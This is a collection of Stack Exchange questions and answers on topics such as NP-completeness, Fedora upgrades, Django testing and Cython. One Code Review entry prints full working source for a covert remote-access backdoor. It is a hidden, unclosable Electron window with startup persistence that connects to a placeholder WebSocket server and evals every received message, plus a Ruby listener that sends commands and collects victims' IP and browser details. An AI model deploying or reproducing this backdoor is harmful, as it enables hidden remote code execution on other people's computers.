_cs.4592 | Stephen Cook's proof of the NP-completeness of SAT is constructive. Given a Turing machine $M$, one can create a logical formula that is satisfiable if and only if $M$'s computation halts in an accepting state. This suggests that we could take a logical formula and create a Turing machine $M'$ whose computation is described by that formula, thereby creating an artificial problem solved by $M'$. Is it possible to use existing NP-complete problems to create other NP-complete problems? Can this be automated? | Creating artificial NP-Complete problems | algorithms;np complete | Dodging any questions about whether this is interesting or artificial (or whether Computer Science really needs any more NP-complete problems than it already has), the answer is yes. Pick a structure-preserving mapping between some set of strings and problem instances of 3SAT. Show that the mapping can be computed in polynomial time (i.e., it is a polytime reduction). Then, deciding if a string is in your set of strings is NP-complete. Repeat as desired (the composition of polytime reductions is a polytime reduction.)If you wanted to automate this process of creating new NP-complete problems, then it would likely be more efficient to construct the mappings from some base set of polytime mappings, using methods known to preserve polynomial time, rather than picking an arbitrary mapping and proving that it is a polytime reduction.Note that this is not quite what you suggest in your question. You can take a logical formula and build a Turing machine corresponding to it, but that in itself doesn't lead to an NP-complete problem. For instance, 2SAT instances can be decided in polynomial time. And a particular formula will only correspond to a particular machine, whereas you need a set of formulas (or machines) to define a complexity class; so to make new problems in NPC, you really need to show how one set can be converted into another (i.e. a polytime reduction), even if your sets are sets of logical formulas. |
_unix.115264 | I'm trying to upgrade my Fedora install from 19 (3.12.8-200.fc19.x86_64) to 20. I have installed and ran fedup, it creates a new entry on the boot list but a progress screen is briefly displayed and then it reboots back to Fedora 19.Here's what I tried:# yum install fedup# yum --enablerepo=updates-testing upgrade fedup# fedup --network 20# fedup-cli --network 20and by following this post:# yum install rpmconf; rpmconf -a # find /etc /var -name '*?.rpm?*' # yum install yum-utils; package-cleanup --leaves# package-cleanup --orphans # yum install fedup# fedup-cli --network 20 --debuglog /root/fedupdebug.logIs there a way to log what happens at the post-reboot stage? It seems to be failing at this phase. | Fedup fails to update Fedora 19 to 20 | fedora;upgrade | null |
_cs.73761 | I cannot go on with this exercise:Determine whether $L = \{a^nb^m \mid n > 2^m \}$ is context-free.Let's suppose that $L$ is context-free. According to the pumping lemma, there exists $N > 0$ such that every $z \in L$ of size at least $N$ has a decomposition $z = uvwxy$ such that$|vwx| \leq N$.$|vx| \geq 1$.For all $i \geq 0$, $z_i = uv^iwx^iy$ is in $L$.Let's use $z= a^{2^N+1}b^N$.Then$|z| = 2{^N+1} +N > N$ and $v= a^h$ and $x= b^k$ with $1 \leq h+k \leq N$.So $z_i = a^{2^N+1}a^{h(i-1)} b^{N-k}b^{k(i-1)}$.So if there exists $i > 0$ such that $2^N+1+h(i-1) \leq 2^{N+(i-1)k}$, then $z_i \notin L$.How can I go on to show that $L$ is not context-free? | Is the language $L=\{a^nb^m \mid n>2^m\}$ context-free? | context free;pumping lemma | null |
_unix.366730 | I am using cygwin on Windows 10. I can't seem to find any package named xv while in the cygwin setup. How can I use xv on Windows using cygwin or otherwise. | Installiing XV on windows using cygwin | x11;cygwin;image viewer | As XV is not provided you can try to compile it by yourself.However as the code is a bit old, last version in 1994, there is no guarantee that it will easily build in modern systems like current Cygwinhttps://en.wikipedia.org/wiki/Xv_%28software%29As there are several equivalent programs in cygwin, you can try one of them. |
_unix.130911 | I have an OpenElec based HTPC which boots from a USB stick. I would like to replace this with an SSD drive. What is the best way of copying the USB image to the SSD. Is this something that dd could do or would I be better off reinstalling on the SSD from scratch? | Replace USB stick boot device with SSD | usb drive;ssd | dd should work, if you want to use the same filesystem there.Unfortunately the new partition will have the same size; you probably need to enlarge the partition afterwards.Some partitioning tools allow you to copy data from one partition to another (the one in the debian installer does) but they might just use dd aswell.Of course should be capable of resizing the partition afterwards.Personally I would suggest using rsync with appropriate flags.I suggest rsync --archive --hard-links --acls --xattrs --one-file-system, that should get you pretty much everything.Please check the man page if these flags are right for you, you might not need --acls or --xattrs. But you should use --one-file-system or strange things will happen with /proc and the like. |
_softwareengineering.129259 | I really enjoy watching live code demos, especially when time is focused on what the code is doing instead of what the presenter is typing. Many seem to be using apps to manage their clipboard to paste code into the IDE. What apps are out there for skillfully managing your clipboard to seamlessly do a code demo?UPDATE:I found this app that Apple engineers use called DemoMonkey. It's actually an OS X app demo for, ironically enough, the clipboard and system services. The link includes the source so creating a PC equivalent would be easy, is there really nothing out there? | Apps for facilitating live code demos? | demonstration | null |
_unix.195034 | I got my laptop battery accidently disconnected, while the laptop was suspended to RAM. And now I'm experiencing these problems:When I'm trying to login to the system using sddm or kdm:after I enter my password - I'm getting mouse cursor and default wallpaper displayed and nothing happens after that.It doesn't matter if I'm trying to login to kde or to TWM.I've created a new user to test whether is it related to some user settings. It's not. The same thing happens for a new user.I can login to the tty console.I can perform startx and startkde with root credentionals and kde works just fine.But if I'm performing startx with standart user credentionals - twm starts and then my laptop ignoring any input (besides power button).My ~/.xsession-errors contains only the following line:sudo: no tty present and no askpass program specifiedI've already done fsck.Do you have any idea what I'm dealing with here?UPD:Some (probably relevant) info from journalctl. After the login attempt with sddm, I'm getting:dbus: [system] Failed to activate service 'org.freedesktop.login1': timed out sddm-helper: pam_systemd(sddm:session): failed to create session: connection timed out | *DM Login problems | arch linux;xorg;login;kdm | It was quite counterintuitive for me, but reinstalling sudo and editing sudoers file helped. |
_webapps.33618 | Can one ensure that certain people subscribe to a particular card in Trello?If not, one has to add a FYI or a cc to a list of people in each message. | Trello: Subscribe function | trello cards;trello lists | null |
_unix.96556 | I'm trying to create a monitoring system for a remote machine using an IPMI Serial Over Lan (SOL) console. The remote OS is RHEL 6, the mobo manufacturer is Supermicro. I've successfully enabled SOL redirection in the BIOS. This allows me to see the BIOS and kernel parts of bootup through an attached SOL console over IPMI. Next, I followed the steps mentioned in many online articles to get my OS ( runlevel 3, just text terminal ) to redirect too. The result is almost always the same :After making the changes to /etc/grub.conf, /etc/inittab, and /etc/securetty, i can see the grub menu through the SOL console (yay!), but as soon as the OS starts booting, my SOL terminal receives 1 gibberish character, and nothing more. Some thoughts: I'm not exaclty sure which serial port my BIOS are trying to redirect stuff into (ttyS0, ttyS1). Most of the examples use ttyS1, and since the grub menu gets redirected there, i'm pretty confident thats 'correct'I know the 'terminal types' and baud rates have to match between the BIOS and OS settings. I am consistently using 115200 for baud, but i'm less confident I'm choosing the right terminal type. The terminal type in BIOS is ANSI, and this gives the coloration i want for the BIOS over SOL. However, for the OS settings, most of the examples use 'linux'; i'm not sure if that's compatible with my ANSI setting. I've tried VT100 for both BIOS and OS, and I still never see anything past the Grub menu (plus, i lose color info for my BIOS over SOL).Any help is greatly appreciated. | Serial Over Lan redirection stops at OS boot | linux;serial port;rhel | null |
_softwareengineering.189136 | I'm really struggling to write effective unit tests for a large Django project. I have reasonably good test coverage, but I've come to realize that the tests I've been writing are definitely integration/acceptance tests, not unit tests at all, and I have critical portions of my application that are not being tested effectively. I want to fix this ASAP.Here's my problem. My schema is deeply relational, and heavily time-oriented, giving my model object high internal coupling and lots of state. Many of my model methods query based on time intervals, and I've got a lot of auto_now_add going on in timestamped fields. So take a method that looks like this for example:def summary(self, startTime=None, endTime=None): # ... logic to assign a proper start and end time # if none was provided, probably using datetime.now() objects = self.related_model_set.manager_method.filter(...) return sum(object.key_method(startTime, endTime) for object in objects)How does one approach testing something like this? Here's where I am so far. It occurs to me that the unit testing objective should be given some mocked behavior by key_method on its arguments, is summary correctly filtering/aggregating to produce a correct result?Mocking datetime.now() is straightforward enough, but how can I mock out the rest of the behavior? I could use fixtures, but I've heard pros and cons of using fixtures for building my data (poor maintainability being a con that hits home for me).I could also setup my data through the ORM, but that can be limiting, because then I have to create related objects as well. And the ORM doesn't let you mess with auto_now_add fields manually.Mocking the ORM is another option, but not only is it tricky to mock deeply nested ORM methods, but the logic in the ORM code gets mocked out of the test, and mocking seems to make the test really dependent on the internals and dependencies of the function-under-test.The toughest nuts to crack seem to be the functions like this, that sit on a few layers of models and lower-level functions and are very dependent on the time, even though these functions may not be super complicated. My overall problem is that no matter how I seem to slice it, my tests are looking way more complex than the functions they are testing. | Unit testing in Django | testing;unit testing;django | null |
_softwareengineering.191303 | If I split one class into two classes should both classes have history in source control tracing back to the original class that contained both; or should the new class be added as a new file without any history tracing back?When splitting a large class into two similar sized parts this seems like the natural approach since the older versions of the combined class will have large amounts of relevant history for both descendents. When I'm just pulling one or two methods out to create a helper class, having the complete history for the new class be >90% changes in the parent that affected code that wasn't split out seems like a recipe for confusion in the future. | Should a new class refactored out of an existing one have history pointing back to it's progenitor | version control;refactoring | It's much easier to ignore some history later than to try to splice it back in. In general you want to favor the least destructive option. People primarily review source control history for three reasons:To find out which change introduced a bug.To discern the reasons why a section of code is in there.To find out what has changed since the last release or the last time you updated.Copying history for a split file contributes little if any confusion for any of those use cases. The worst that happens is you have to sift through some irrelevant commits, and you generally have to do that anyway. On the other hand, not having the history past a certain point makes the first two use cases much more difficult. |
_codereview.29914 | I forked this repo to be more concise. The code is here. I'll paste it below since that seems to be the style. I removed the class definitions at the bottom that I didn't change -- the edit I'm concerned with is the use of the class_factory function at the bottom. Is this good? Pythonic? from selenium.webdriver import DesiredCapabilitiesfrom selenium.webdriver.firefox.webdriver import WebDriver as _Firefoxfrom selenium.webdriver.chrome.webdriver import WebDriver as _Chromefrom selenium.webdriver.ie.webdriver import WebDriver as _Iefrom selenium.webdriver.remote.webdriver import WebDriver as _Remotefrom selenium.webdriver.phantomjs.webdriver import WebDriver as _PhantomJSfrom webdriverplus.utils import _downloadfrom webdriverplus.webdriver import WebDriverDecoratorfrom webdriverplus.webelement import WebElementimport atexitimport osimport socketimport subprocessimport timetry: from urllib2 import URLErrorexcept ImportError: from urllib.error import URLErrorVERSION = (0, 2, 0)def get_version(): return '%d.%d.%d' % (VERSION[0], VERSION[1], VERSION[2])class WebDriver(WebDriverDecorator): _pool = {} # name -> (instance, signature) _quit_on_exit = set() # set of instances _selenium_server = None # Popen object _default_browser_name = 'firefox' @classmethod def _at_exit(cls): Gets registered to run on system exit. if cls._selenium_server: cls._selenium_server.kill() for driver in cls._quit_on_exit: try: driver.quit(force=True) except URLError: pass @classmethod def _clear(cls): cls._pool.clear() @classmethod def _get_from_pool(cls, browser): Returns (instance, (args, kwargs)) return cls._pool.get(browser, (None, (None, None))) def __new__(cls, browser=None, *args, **kwargs): browsers = {'firefox':Firefox, 'chrome':Chrome, 'ie':Ie, 'remote':Remote, 'phantomjs':PhantomJS, 'htmlunit':HtmlUnit} quit_on_exit = kwargs.get('quit_on_exit', True) reuse_browser = kwargs.get('reuse_browser') signature = (args, kwargs) browser = browser or cls._default_browser_name reused_pooled_browser = False pooled_browser = None try: is_str = isinstance(browser, basestring) except NameError: is_str = isinstance(browser, str) if is_str: browser = browser.lower() pooled_browser, pooled_signature = WebDriver._get_from_pool(browser) if pooled_signature == signature: driver = pooled_browser reused_pooled_browser = True elif browser in browsers.keys(): driver = browsers[browser](*args, **kwargs) else: raise BrowserNotSupportedError() # If a WebDriverDecorator/WebDriver is given, add it to the pool elif isinstance(browser, WebDriverDecorator): driver = browser browser = driver.name else: kwargs['driver'] = browser driver = WebDriverDecorator(*args, **kwargs) browser = driver.name if reuse_browser and not reused_pooled_browser: if pooled_browser: pooled_browser.quit(force=True) WebDriver._pool[browser] = (driver, signature) if quit_on_exit: WebDriver._quit_on_exit.add(driver) return driver def __init__(self, browser='firefox', *args, **kwargs): pass # Not actually called. Here for autodoc purposes only.atexit.register(WebDriver._at_exit)browser_types = ({'name':'Firefox', 'driver':_Firefox}, {'name':'Chrome', 'driver':_Chrome}, {'name':'Ie', 'driver':_Ie}, {'name':'Remote', 'driver':_Remote}, {'name':'PhantomJS', 'driver':_PhantomJS},)def class_factory(browser_type, bases): class Class_(*bases): def __init__(self, *args, **kwargs): kwargs['driver'] = browser_type['driver'] super().__init__(*args, **kwargs) Class_.__name__ = browser_type['name'] return Class_for browser_type in browser_types: globals()[browser_type['name']] = class_factory(browser_type, (WebDriverDecorator,)) | Streamlining repetitive class definitions in python with a class_factory() function | python;classes;python 3.x;meta programming | It's not unknown: python is really good at this, although the more common approach would be to use a metaclass. The immediate drawbacks are1) it introduces a state-changing dependency to the import statement. If code that is using this code gets imported in a non-standard way you may get confusing errors because types will or will not appear depending on when this module gets run. It's not a major issue if this code will be imported directly but it's potentially problematic if there is more magic going on elsewhere.2) less importantly, it's going to play hell with IDE's that try to do autocomplete for you :)I'm guessing that the super().init idiom is a python 3 replacement for type('Name', (),{}) by it's form. If it's not - that is the old way to create a runtime type and it avoids creating and renaming the Class_ class, which seems messy to me. Examples of the 'old way' hereLastly: this seems like classes that differ only in data, or to be more precise in composition. In cases like that I've always found it more maintainable to do it declaratively with class-level variables and appropriate indirections:class Browser(object): BROWSER = 'browser' DRIVER = None @property def name(self): return self.BROWSER def do_something(self): self.DRIVER.do_something()class Firefox(Browser): BROWSER = 'Firefox' DRIVER = _Firefoxclass Chrome (Browser): BROWSER = 'Chrome' DRIVER = _ChromeDoing this allows you to do subclassing and overrides as appropriate, which is much hairier with types that have to be created before they can be changed. |
_softwareengineering.315847 | Suppose we have a set of binary trees with their inorder and preorder traversals given and where no tree is a subtree of another tree in the given set. Now another binary tree Q is given.Find whether it can be formed by joining the binary trees from the given set(while joining each tree in the set should be considered atmost once). In this case a joining operation means: Pick the root of any tree in the set and hook it to any vertex of another tree such that the resulting tree is also a binary tree.Can we do this using LCA (least common ancestor)? Or does it needs any special datastructure to solve? | Joining binary trees | data structures;binary tree | null |
_codereview.129629 | I have created an Electron Application with a JavaScript/NodeJS Backdoor and a Ruby command-line listener.I created this program for remote administration of my home computer securely using a new technology (WebSockets) which I found very interesting.The program is two parts: The Electron application written in JavaScript which includes a JavaScript backdoor using WebSockets.A Ruby command-line WebSocket listener with the ability to communicate and send commands to the Electron application.I'd love any general suggestions or fixes!Feel free to only look at the client or server based on if you only know JavaScript or Ruby.You may ignore anything that says TODO because this site is not about fixing non functioning code.The project is also available on Github.To download all the code you can use:git clone https://github.com/IMcPwn/browser-backdoorclient/main.js (the Electron application)/* * BrowserBackdoor - https://github.com/IMcPwn/browser-backdoor * BrowserBackdoor is an electron application that uses a JavaScript backdoor (in index.html) * to connect to the listener (BrowserBackdoorServer). * For more information visit: http://imcpwn.com * MIT License * Copyright (c) 2016 Carleton Stuberg * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the Software), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * THE SOFTWARE IS PROVIDED AS IS, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */const electron = require('electron')const AutoLaunch = require('auto-launch');const app = electron.app;const dialog = electron.dialog;const globalShortcut = electron.globalShortcut;const BrowserWindow = electron.BrowserWindow;const Menu = electron.Menu;// Keep a global reference of the window object so it doesn't get garbage collected.let mainWindow;// Passing true enables startup, false disables startup.function manageStartup(enable) { let appLauncher = new AutoLaunch({ // Change this to the name of the application or what // should appear in the startup menu. name: 'BB' }); if (enable) { appLauncher.isEnabled().then(function(enabled){ if(enabled) return; return appLauncher.enable(); }).then(function(err){ // TODO: Deal with error }); } else { appLauncher.isEnabled().then(function(enabled){ if(!enabled) return; return appLauncher.disable(); }).then(function(err){ // TODO: Deal with error }); }}function createWindow() { // Change CommandOrControl+Alt+\ to the shortcut to manage the application. globalShortcut.register('CommandOrControl+Alt+\\', function () { let result = dialog.showMessageBox({ type: 'info', title: 'Shortcut pressed', message: 'You pressed the keyboard shortcut. \nIf you do not know what you are doing press cancel.', buttons: ['Quit Application', 'Enable Startup', 'Disable Startup', 'Cancel'] }); if (result === 0) { mainWindow = null; app.exit(0); } else if (result === 1) { manageStartup(true); } else if (result === 2) { manageStartup(false); } }); // Create a hidden browser window which loads the backdoor. mainWindow = new BrowserWindow({ width: 1, height: 1, show: false, closable: false, transparent: true, resizable: false, skipTaskbar: true }); mainWindow.loadURL(`file://${__dirname}/index.html`); // Hide application menu. Menu.setApplicationMenu(null); mainWindow.on('closed', function() { mainWindow = null; });}// Only allow one instance of the application at a time.const shouldQuit = app.makeSingleInstance((commandLine, workingDirectory) => { if (mainWindow === null) { createWindow(); }});if (shouldQuit) { mainWindow = null; app.exit(0);}// Hide application from tray if on OS X.if (process.platform === 'darwin') { app.dock.hide();}// Catch uncaughtExceptions so no popups appear on errors.process.on('uncaughtException', function ( err ) { // TODO: Restart application or print error message console.error('An uncaughtException was found, the program will end.'); process.exit(1);});// Accept --startup as command line argument to enable on startup.process.argv.forEach(function (val, index, array) { if (val === --startup) { manageStartup(true); }});app.on('before-quit', function() { mainWindow = null;});app.on('will-quit', function() { globalShortcut.unregisterAll()});// This method will be called when Electron has finished// initialization and is ready to create browser windows.app.on('ready', createWindow)// Re-open if all windows are closed.app.on('window-all-closed', function() { createWindow();});app.on('activate', function() { // Create window if activated and it doesn't already exist. if (mainWindow === null) { createWindow(); }});client/package.json (required for the Electron application){ name: BrowserBackdoor, version: 1.0.0, description: Electron application to connect to BrowserBackdoorServer, main: main.js, scripts: { start: electron main.js }, repository: { type: git, url: git+https://github.com/IMcPwn/browser-backdoor.git }, author: Carleton Stuberg, license: MIT, bugs: { url: https://github.com/IMcPwn/browser-backdoor/issues }, homepage: https://github.com/IMcPwn/browser-backdoor, devDependencies: { electron-prebuilt: ^1.1.2, auto-launch: 2.0.1 }}client/index.html (the JavaScript backdoor)<!DOCTYPE html><html><head> <script> /* * Copyright (c) 2016 Carleton Stuberg - http://imcpwn.com * BrowserBackdoor - https://github.com/IMcPwn/browser-backdoor * See the file 'LICENSE' for copying permission */ (function connect() { if (WebSocket in window) { // Change host and port to where you're hosting // the WebSocket server. // Also change ws:// to wss:// if secure is enabled on the // server. var ws = new WebSocket(ws://your-server-here:1234); ws.onmessage = function(evt) { if (ws.readyState === 1) { // Send the result of eval'ing the remote message. ws.send(eval(evt.data)); } }; ws.onclose = function() { // Reconnect after 5 seconds. setTimeout(connect, 5000); }; } })(); </script></head><body></body></html>server/bb-server.rb (The listener)#!/usr/bin/env ruby# BrowserBackdoorServer - https://github.com/IMcPwn/browser-backdoor# BrowserBackdoorServer is a WebSocket server that listens for connections # from BrowserBackdoor and creates an command-line interface for # executing commands on the remote system(s).# For more information visit: http://imcpwn.com# MIT License# Copyright (c) 2016 Carleton Stuberg# Permission is hereby granted, free of charge, to any person obtaining a copy# of this software and associated documentation files (the Software), to deal# in the Software without restriction, including without limitation the rights# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell# copies of the Software, and to permit persons to whom the Software is# furnished to do so, subject to the following conditions:# The above copyright notice and this permission notice shall be included in all# copies or substantial portions of the Software.# THE SOFTWARE IS PROVIDED AS IS, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE# SOFTWARE.require 'em-websocket'require 'yaml'# TODO: Make all the variables besides $wsList non global.$wsList = Array.new$selected = -1COMMANDS = { help => Help menu, exit => Quit the application, sessions => List active sessions, use => Select active session, info => Get session information (IP, User Agent), exec => Execute a command on a session, get_cert => Get a free TLS certificate from LetsEncrypt, load => Load a module (not implemented yet)}WELCOME_MESSAGE = \ ____ ____ _ _ \n\| _ \ | _ \ | | | | \n\| |_) |_ __ _____ _____ ___ _ __| |_) | __ _ ___| | ____| | ___ ___ _ __ \n\| _ <| '__/ _ \ \ /\ / / __|/ _ \ '__| _ < / _' |/ __| |/ / _' |/ _ \ / _ \| '__|\n\| |_) | | | (_) \ V V /\__ \ __/ | | |_) | (_| | (__| < (_| | (_) | (_) | | \n\|____/|_| \___/ \_/\_/ |___/\___|_| |____/ \__,_|\___|_|\_\__,_|\___/ \___/|_| by IMcPwn\n\Visit http://imcpwn.com for more information.\ndef main() begin configfile = YAML.load_file(config.yml) Thread.new{startEM(configfile['host'], configfile['port'], configfile['secure'], configfile['priv_key'], configfile['cert_chain'])} rescue => e puts 'Error loading configuration' puts e.message puts e.backtrace return end cmdLine()enddef print_error(message) puts [X] + messageenddef print_notice(message) puts [*] + messageenddef infoCommand() # TODO: Improve method of getting IP address infoCommands = [var xhttp = new XMLHttpRequest();xhttp.open(\GET\, \https://ipv4.icanhazip.com/\, false);xhttp.send();xhttp.responseText,navigator.appVersion;, navigator.platform;, navigator.language;] infoCommands.each {|cmd| begin sendCommand(cmd, $wsList[$selected]) rescue print_error(Error sending command. Selected session may no longer exist.) break end }enddef sessionsCommand() if $wsList.length < 1 puts No sessions return end puts ID: Connection $wsList.each_with_index {|val, index| puts index.to_s + : + val.to_s }enddef execCommand(cmdIn) if cmdIn.length < 2 loop do print Enter the command to send. (exit when done)\nCMD-#{$selected}> cmdSend = gets.split.join(' ') break if cmdSend == exit next if cmdSend == begin sendCommand(cmdSend, $wsList[$selected]) rescue print_error(Error sending command. Selected session may no longer exist.) end end else # TODO: Support space begin sendCommand(cmdIn[1], $wsList[$selected]) rescue print_error(Error sending command. Selected session may no longer exist.) end endenddef useCommand(cmdIn) if cmdIn.length < 2 print_error(Invalid usage. Try help for help.) return end selectIn = cmdIn[1].to_i if selectIn > $wsList.length - 1 print_error(Session does not exist.) return end $selected = selectIn print_notice(Selected session is now + $selected.to_s + .)enddef cmdLine() puts WELCOME_MESSAGE print \nWebSocket listener is now running...\nEnter help for help. loop do print \n> cmdIn = gets.chomp.split() case cmdIn[0] when help COMMANDS.each do |key, array| print key print --> puts array end when exit break when sessions sessionsCommand() when use useCommand(cmdIn) when info if validSession?($selected) infoCommand() else next end when exec if validSession?($selected) execCommand(cmdIn) else next end when get_cert if File.file?(getCert.sh) system(./getCert.sh) else print_error(getCert.sh does not exist) end else print_error(Invalid command. Try help for help.) end endenddef validSession?(selected) if selected == -1 print_error(No session selected. Try use SESSION_ID first.) return false elsif $wsList.length < $selected print_error(Session no longer exists.) return false end return trueenddef sendCommand(cmd, ws) ws.send(cmd)enddef startEM(host, port, secure, priv_key, cert_chain) EM.run { EM::WebSocket.run({ :host => host, :port => port, :secure => secure, :tls_options => { :private_key_file => priv_key, :cert_chain_file => cert_chain } }) do |ws| $wsList.push(ws) ws.onopen { |handshake| print_notice(WebSocket connection open: + handshake.to_s) } ws.onclose { print_error(Connection closed) $wsList.delete(ws) # TODO: Fix this. Reset selected error so the wrong session is not used. $selected = -1 } ws.onmessage { |msg| print_notice(Response received: + msg) } ws.onerror { |e| print_error(e.message) $wsList.delete(ws) # Reset selected variable after error $selected = -1 } end }endmain()server/config.yml (Configuration for the listener)## Copyright (c) 2016 Carleton Stuberg - http://imcpwn.com# BrowserBackdoorServer by IMcPwn.# See the file 'LICENSE' for copying permission#host: 0.0.0.0port: 1234# Requires valid private key and certificate.secure: falsepriv_key: privkey.pemcert_chain: cert.pemGemfile (The listener's gems)## Copyright (c) 2016 Carleton Stuberg - http://imcpwn.com# BrowserBackdoorServer by IMcPwn.# See the file 'LICENSE' for copying permission#source 'https://rubygems.org'gem 'eventmachine'gem 'em-websocket' | Electron Application with JavaScript Backdoor and Ruby Command-Line Listener | javascript;ruby;node.js;websocket | null |
_unix.68590 | Is there a way to setup squid (or another caching proxies) to cache any http/https request from my own computer? i will use it to record all request and get the downloaded files from software that does not show the url's or redownload packages that already been downloaded (such as Yaourt --> this package always redownload packages that already been downloaded, it's really takes too much bandwidth for big packages) | Self cache-proxying all outcoming http/https request | proxy;http proxy | null |
_codereview.147691 | I've just solved this problem and I hope you guys give me any feedback to make my code be better.Problem: There are N strings. Each string's length is no more than 20 characters. There are also Q queries. For each query, you are given a string, and you need to find out how many times this string occurred previously.Input FormatThe first line contains N, the number of strings. The next N lines each contain a string. The N+2nd line contains Q, the number of queries. The following Q lines each contain a query string.import java.io.*;import java.util.*;public class Solution { public static void main(String[] args) { Scanner scan = new Scanner(System.in); int n = scan.nextInt(); String[] stringArr = new String[n]; for (int i = 0; i < n; i++){ stringArr[i] = scan.next(); } int q = scan.nextInt(); for (int i = 0; i < q; i++){ String stringQue = scan.next(); int occNum = 0; for (int j = 0; j < n; j++){ if (stringQue.equals(stringArr[j])) occNum++; } System.out.println(occNum); } }} | Hackerrank Sparse Arrays Solution in Java | java;programming challenge;array | null |
_unix.82472 | I want to delete the occurrence of a character in a string only for the first occurrence.Example:echo B123_BACK | tr -d 'B'This results in output:123_ACKHow can I delete only the first occurrence of charcater 'B' so that the output looks like123_BACK | Delete only first occurrence of character using tr | tr | Looking at the tr man page, this isn't possible. Why not use sed instead:echo B123_BACK|sed 's/B//' |
_webapps.39683 | I updated the gravatar for my e-mail address (a few days ago), but GitHub Enterprise is still displaying the old one. How do I force it to refresh? | How do I force GitHub Enterprise to refresh gravatar? | github;gravatar | This fix is easy. I will confirm this works since I work at the same organization as Brian Knoblauch. Simply navigate to ${github.url}/stafftools and navigate down to the 'enable gravatars' option (under settings tab) and enable it. The server will restart and your gravatars will now appear. |
_cogsci.5900 | A while back I created an iPhone app that helps me create a composite like the one below. Can observing such a composite have an impact of attributing the qualities perceived in the composite to oneself? For example feeling more open or extraverted.http://luciddreamingapp.com/wp-content/uploads/2012/01/Augmented-Reality-Alexander-Stone-37percent-with-Average-attractive-male-200x300.pngThe reason I'm asking is that I foundthis answer to question about facial features and personality. Within an answer, there's a link to this paper: Personality judgments from natural and composite facial images.The paper suggests that ordinary, untrained people are capable of naturally recognizing and rating a face on a big 5 personality traits. The author proceeds to show that composite faces that are rated high on the socially - desirable traits, like extraversion, openness and agreeableness are rated as more attractive by the study's test subjects:Here are the attractiveness ratings summary from the male faces above:When using my app, the user's brain is tricked into recognizing the composite image as one's own, because it is made of a live camera image + static image, and the image can blink, smile, frown, etc. The brain merges the two images, potentially distorting the true geometry of one's face by perceiving a composite image.Here is a quote from that article on the self fulfilling prophesy effect (page 635):For example, people with facial features that elicit attributions of agreeableness may be treated as more trustworthy and may perhaps consequently develop more agreeable personality characteristics.I'm interested if perceiving such composite can activate the same mechanisms used to judge other faces, thus creating the same self-fulfilling prophesy and having an impact on one's personality?Probably a part of the answer to the question is in answering the question: does one's own image in the mirror affect one's personality? | Can observing a composite photo of one's own face have an impact on own personality? | social psychology;perception;personality | null |
_softwareengineering.323541 | I have a Windows Form for creating configs. It has around 50 fields of data, which represent a group of entities, that I need to capture when the user presses the save button. Currently, on the press of the save button I build the group of Entities by creating each entity, extracting the information from the controls and then save them to the database.I am now working on functionality to import the partly built configs from XML. With the way the save button works I would be replicating almost all of the save code to achieve this.The only alternative I think of was to pass the values of the controls as parameters to a new class that will contain methods that build and return an entity. However, passing ~15 parameters to each entity creator method does not seem to be a clean solution.Is there any clean way of disconnecting the save logic from the WinForm that will enable me to reuse the save code? | Separating save logic from WinForm to make it reusable | design;entity framework;winforms;separation of concerns | Start with some building blocks first:make a class MyConfigData, a simple DTO object, no special logic here. It should hold all the configuration data you want to manageimplement methods void SetData(MyConfigData config) and MyConfigData GetData() in your form - these two methods should transfer the data from the DTO object into the form, and vice versa.create a class ConfigDbRepo with a method Save(MyConfigData config) and MyConfigData Load(). Put the database load and save logic here.put the code to load and save the config data from or to an XML file in a similar class ConfigXmlRepo. If you like, the two classes can have a common interface IConfigRepo, but that is not mandatory.What remains is to connect these pieces together. How you will do this depends somewhat on how your application works in general, if your form is modal or non-modal, and how exactly your application controls when to load/save from a db and when to load/save to an XML file. But I hope it is clear that with these tools you can load a config from an arbitrary source (Xml, Db, Form) and save it also to an arbitrary source (Xml, Db, Form), without any avoidable duplicate code. |
_cs.70066 | Does the Ford-Fulkerson/Edmonds-Karp algorithm still work on a network graph where a bidirectional connection exists between two nodes? e.g. $(a,b)$, $(b,a)$ $\in E$Thought there would be trouble creating the back edges in the residual network when the edge already exists? Or is it equivalent to increase it's flow instead? | Bidirectional connection in Ford-fulkerson's/Edmonds-Karp's algorithm | network flow;ford fulkerson | null |
_unix.280469 | How can I give files extended attributes in mac os x? Mac os x doesn't have the 'setattr' command. | How can I give files extended attributes in mac os x? | files;osx;xattr | null |
_unix.373834 | https://stackoverflow.com/questions/5105482/compile-main-python-program-using-cython seems to indicate that (just like a C-program) you need to jump through hoops to get things running.Being used to simply prepending #!/usr/bin/python I am wondering if there is a shebang wrapper that does The Right Thing. I am thinking something like:#!/usr/bin/cythonwrapperprint Hello worldwhere cythonwrapper checks if the cached file is newer and if not converts the script into C, compiles it, put the compiled file into a cache and runs it. | Shebang for cython | python | There is one now. It is called shython: https://gitlab.com/ole.tange/tangetools/tree/master/shython |
